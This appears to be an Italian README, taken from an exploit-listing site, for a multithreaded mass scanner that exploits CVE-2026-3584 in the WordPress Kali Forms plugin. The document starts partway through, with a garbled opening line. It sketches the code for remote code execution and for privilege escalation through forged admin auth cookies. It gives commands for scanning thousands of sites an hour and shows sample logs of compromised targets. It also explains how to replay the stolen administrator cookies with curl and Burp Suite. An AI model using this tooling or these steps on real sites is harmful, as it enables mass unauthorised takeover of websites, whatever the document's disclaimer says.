Share
## https://sploitus.com/exploit?id=F82B5EC8-DE6E-5E9A-AA0F-305DA9C41A20
# CVE-2026-3584 – WordPress Kali Forms  10000 e 'PHP Version' presente
    # Salva HTML completo per analisi
```

**6. Test Escalation Privilegi**
```python
def test_privilege_escalation_fast(self, target, nonce, user_ids, post_ids):
    # Strategia intelligente:
    # 1. Cerca sovrapposizioni user_id/post_id
    # 2. Testa prima ID con alta probabilità successo
    # 3. Fallback su ID comuni: 1,2,3,4,5
    
    # Per ogni formId candidato:
    # POST data[entryCounter]=wp_set_auth_cookie
    # Estrae cookie: wordpress_logged_in + wordpress_sec
    # Verifica: GET /wp-admin/ → no redirect
    # Controlla: 'dashboard' in response
```

**7. Multi-Threading**
```python
# ThreadPoolExecutor per elaborazione parallela
# Thread-safe locks per scrittura risultati
# Salvataggio real-time (append mode)
# Statistiche globali con sync
```

**8. Sistema di Backup Automatico**
```python
def backup_previous_results(self):
    # Prima di ogni scan:
    # result_phpinfo.txt → result_phpinfo.txt.20260325_120000.backup
    # result/ → result.20260325_120000.backup/
    # result_cookie/ → result_cookie.20260325_120000.backup/
    # Preserva tutti i dati storici
```

---

## 🚀 **Utilizzo del Mass Scanner**

### **Requisiti**

```bash
pip3 install requests beautifulsoup4
```

### **Preparazione File Obiettivi**

Creare un file `targets.txt` con un obiettivo per riga (http/https opzionale):

```
example.com
wordpress.site
192.168.1.100
http://blog.example.org
https://secure.site.com:8080
```

### **Esecuzione Base**

```bash
# Scansione con impostazioni predefinite (20 thread)
python3 mass_scanner.py targets.txt

# Scansione con thread personalizzati
python3 mass_scanner.py -t 10 targets.txt

# Scansione con numero massimo di thread
python3 mass_scanner.py --threads 50 targets.txt
```

### **Output durante la Scansione**

```
======================================================================
SCANNER DI MASSA - CVE-2026-3584 Pipeline Completa
======================================================================
Obiettivi: 100
Thread:    20
Pipeline:  Ricognizione → Scoperta Moduli → RCE → Escalation Privilegi
======================================================================

[*] Risultati precedenti salvati in: result_phpinfo.txt.20260325_120000.backup

[04:38:28] [INFO] https://target1.com: Avvio scansione...
[04:38:28] [INFO] https://target1.com: Fase 1: Enumerazione API REST...
[04:38:29] [INFO] https://target1.com: Trovati 3 utenti via API
[04:38:29] [INFO] https://target1.com: Trovati 5 post via API
[04:38:29] [INFO] https://target1.com: Fase 2: Scoperta moduli...
[04:38:31] [INFO] https://target1.com: Trovate 8 pagine con moduli
[04:38:31] [INFO] https://target1.com: Fase 3: Test RCE...
[04:38:31] [INFO] https://target1.com: Test modulo/i [1, 2, 3] con nonce 46aedbd3...
[04:38:32] [SUCCESS] https://target1.com: RCE SUCCESSO sul modulo 1!
[04:38:32] [INFO] https://target1.com: Salvato phpinfo in result/target1.com_form1_phpinfo.html
[04:38:32] [INFO] https://target1.com: Fase 4: Test escalation privilegi...
[04:38:33] [CRITICAL] https://target1.com: ESCALATION PRIVILEGI RIUSCITA con formId=1!
[04:38:33] [INFO] https://target1.com: Cookie salvato in result_cookie/target1.com.txt

[04:38:35] [INFO] https://target2.com: Avvio scansione...
[04:38:36] [INFO] https://target2.com: Fase 1: Enumerazione API REST...
[04:38:37] [WARN] https://target2.com: Nessun Kali Forms trovato
...

======================================================================
STATISTICHE SCANSIONE
======================================================================
Obiettivi totali:     100
Scansionati:          100
Vulnerabili:          45
  - Solo RCE:         10
  - Escalation Priv (CVSS10): 35
Falliti:              55
======================================================================

Risultati salvati:
  - result_phpinfo.txt        (RCE riuscito)
  - result_yes_all.txt (RCE + Escalation Privilegi)
  - result/*.html             (Output phpinfo)
  - result_cookie/*.txt       (Richieste HTTP con cookie amministrativi)
======================================================================
```

### **Interpretazione dei Livelli di Log**

- **[INFO]** - Informazioni generali sul progresso della scansione
- **[SUCCESS]** - RCE confermato, codice eseguito con successo
- **[CRITICAL]** - Escalation privilegi riuscita, accesso amministratore ottenuto
- **[WARN]** - Target non vulnerabile o moduli non trovati
- **[ERROR]** - Errore durante la scansione (timeout, connessione, ecc.)

### **Struttura dei Risultati**

```
/root/
├── result_phpinfo.txt                 # Lista obiettivi con RCE confermato
├── result_yes_all.txt          # Lista obiettivi con accesso admin completo
├── result/                            # File HTML phpinfo dettagliati
│   ├── target1.com_form1_phpinfo.html
│   ├── target2.org_form2_phpinfo.html
│   └── ...
└── result_cookie/                     # Richieste HTTP con cookie amministrativi
    ├── target1.com.txt
    ├── target2.org.txt
    └── ...
```

### **Formato result_phpinfo.txt**

```
https://target1.com | Modulo: https://target1.com/contact | ID Modulo: 1 | Nonce: 46aedbd358 | File: result/target1.com_form1_phpinfo.html
https://target2.org | Modulo: https://target2.org/form | ID Modulo: 2 | Nonce: abc123def4 | File: result/target2.org_form2_phpinfo.html
```

### **Formato result_yes_all.txt**

```
======================================================================
OBIETTIVO: https://target1.com
TIMESTAMP: 2026-03-25T04:38:33.123456
======================================================================
RCE: SUCCESSO
  URL Modulo: https://target1.com/contact
  ID Modulo: 1
  Nonce: 46aedbd358
  phpinfo: result/target1.com_form1_phpinfo.html

ESCALATION PRIVILEGI: SUCCESSO (CVSS 10.0)
  Exploit formId: 1
  Cookie: wordpress_logged_in_xxx=...; wordpress_sec_xxx=...
  File Cookie: result_cookie/target1.com.txt
  Impatto: Accesso amministrativo completo

COMANDI DI SFRUTTAMENTO:
  Test RCE:
    python3 baru_cve_nih.py https://target1.com/contact 1 46aedbd358

  Escalation Privilegi:
    python3 POC_privilege_escalation_v3.py https://target1.com 46aedbd358

======================================================================
```

### **Formato result_cookie/target.txt**

```
GET /wp-admin/ HTTP/1.1
Host: target.com
Cookie: wordpress_logged_in_xxx=admin%7C1774600707%7C...; wordpress_sec_xxx=admin%7C1774600707%7C...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

```

Questo formato è pronto per essere copiato e incollato direttamente in Burp Suite Repeater o utilizzato con curl.

### **Utilizzo dei Cookie Amministrativi**

**Metodo 1: Test con curl**

```bash
# Estrarre cookie dal file
COOKIE=$(grep "^Cookie:" result_cookie/target.com.txt | sed 's/^Cookie: //')

# Testare accesso amministrativo
curl -H "Cookie: $COOKIE" https://target.com/wp-admin/ | grep -i dashboard

# Se output contiene "Dashboard" → Cookie funzionante!
```

**Metodo 2: Utilizzo in Burp Suite**

```bash
# Passo 1: Generare configurazione automatica (opzionale)
./burp_config_gen.sh result_cookie/target.com.txt

# Passo 2: Burp Suite → Proxy → Options → Match and Replace → Add

# Passo 3: Configurazione:
Type:    Request header
Match:   ^Cookie:.*$
Replace: Cookie: [INCOLLA_COOKIE_DA_FILE]
☑ Regex match

# Passo 4: Abilitare la regola (checkbox)

# Passo 5: Navigare a https://target.com/wp-admin/

# Risultato: Accesso amministratore immediato
```

### **Monitoraggio Real-Time**

Durante la scansione, è possibile monitorare i risultati in tempo reale:

```bash
# Terminal 1: Esegui scanner
python3 mass_scanner.py targets.txt

# Terminal 2: Monitora risultati RCE
watch -n 2 'tail -20 result_phpinfo.txt'

# Terminal 3: Monitora escalation privilegi
watch -n 2 'tail -20 result_yes_all.txt'

# Terminal 4: Conta obiettivi vulnerabili
watch -n 5 'echo "RCE: $(wc -l < result_phpinfo.txt) | Admin: $(grep -c "ESCALATION PRIVILEGI: SUCCESSO" result_yes_all.txt)"'
```

### **Backup Automatico**

Prima di ogni nuova scansione, lo scanner esegue automaticamente il backup dei risultati precedenti:

```
Scansione 1: [12:00]
  result_phpinfo.txt
  result_yes_all.txt
  result/
  result_cookie/

Scansione 2: [13:00] - Backup automatico!
  [*] Risultati precedenti salvati in: result_phpinfo.txt.20260325_120000.backup
  [*] Risultati precedenti salvati in: result_yes_all.txt.20260325_120000.backup
  [*] File phpinfo precedenti salvati in: result.20260325_120000.backup/
  [*] File cookie precedenti salvati in: result_cookie.20260325_120000.backup/

Tutti i dati precedenti sono preservati con timestamp!
```

### **Ottimizzazione delle Prestazioni**

**Thread Count Raccomandati:**

```bash
# Rete veloce, molti obiettivi
python3 mass_scanner.py -t 50 targets.txt

# Rete media, obiettivi moderati
python3 mass_scanner.py -t 20 targets.txt  # (predefinito)

# Rete lenta o pochi obiettivi
python3 mass_scanner.py -t 10 targets.txt

# Test singolo (debug)
python3 mass_scanner.py -t 1 targets.txt
```

**Performance Expected:**

- **20 thread:** ~500-1000 obiettivi/ora (dipende dalla rete)
- **50 thread:** ~1000-2000 obiettivi/ora (rischio timeout aumentato)
- **10 thread:** ~300-500 obiettivi/ora (più stabile)

### **Risoluzione Problemi Comuni**

**Problema: Nessun obiettivo vulnerabile trovato**

```bash
# Verifica manuale che il sito abbia Kali Forms
curl -s https://target.com | grep -i "kaliforms"

# Se trovato, estrai nonce manualmente
curl -s https://target.com | grep -i "KaliFormsObject"
```

**Problema: Timeout frequenti**

```bash
# Riduci numero di thread
python3 mass_scanner.py -t 5 targets.txt

# O aumenta timeout modificando il codice (timeout=10 → timeout=30)
```

**Problema: Cookie non funziona**

```bash
# Verifica validità cookie
python3 test_burp_persistent.sh http://target.com

# Se fallisce, rigenera cookie con:
python3 get_fresh_admin_cookie.py http://target.com [NONCE]
```

---

## 🔒 **Avvertenza Legale**

**⚠️ IMPORTANTE:**

Queste informazioni e strumenti sono forniti **esclusivamente per scopi educativi e di test di sicurezza autorizzato**. 

- ✅ **Utilizzo Legale:** Test di penetrazione autorizzato, ricerca sulla sicurezza, formazione
- ❌ **Utilizzo Illegale:** Accesso non autorizzato a sistemi, compromissione di siti senza permesso

**L'accesso o l'utilizzo non autorizzato di sistemi informatici è illegale e non etico.**

Gli autori e i contributori di questo repository non sono responsabili per qualsiasi uso improprio o danno causato da questi strumenti. Gli utenti sono responsabili di garantire di avere l'autorizzazione appropriata prima di testare qualsiasi sistema.

**Utilizzare in modo responsabile e solo con esplicita autorizzazione scritta.**

---

## 📚 **Riferimenti**

**CVE e Advisory:**
- CVE-2026-3584: Kali Forms RCE e Escalation Privilegi
- Link: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
- CVSS Score: 10.0 (Critico)
- CWE-94: Improper Control of Generation of Code ('Code Injection')
- CWE-862: Missing Authorization

**Plugin Vulnerabile:**
- Nome: Kali Forms – WordPress Form Builder
- Slug: kaliforms
- Repository: https://wordpress.org/plugins/kaliforms/
- Versioni Vulnerabili: <= 2.4.9

---

**CVE-2026-3584 | Kali Forms <= 2.4.9 | CVSS 10.0 Critical**

*Ricerca sulla Sicurezza | Sfruttamento Responsabile | Educazione alla Sicurezza Informatica*